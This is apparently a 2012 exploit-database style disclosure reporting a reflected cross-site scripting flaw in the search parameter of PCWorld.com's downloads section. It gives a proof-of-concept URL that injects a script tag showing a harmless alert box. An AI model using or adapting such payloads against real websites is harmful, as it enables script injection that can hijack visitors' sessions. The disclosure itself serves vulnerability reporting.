------------------------------------------------------- # Exploit Title: PCWorld Cross Site Scripting # Date: 19.03.2012 # Author: konsoleskanner # Web Browser : Mozilla Firefox # PoC: http://www.pcworld.com/downloads/search?qt=[XSS] -------------------------------------------------------- A cross site scripting vulnerability exists in PCworld.com's search engine. Demo: http://www.pcworld.com/downloads/search?qt=%3Cscript%3Ealert%28%27beer,%20beer,%20beer%27%29%3C%2Fscript%3E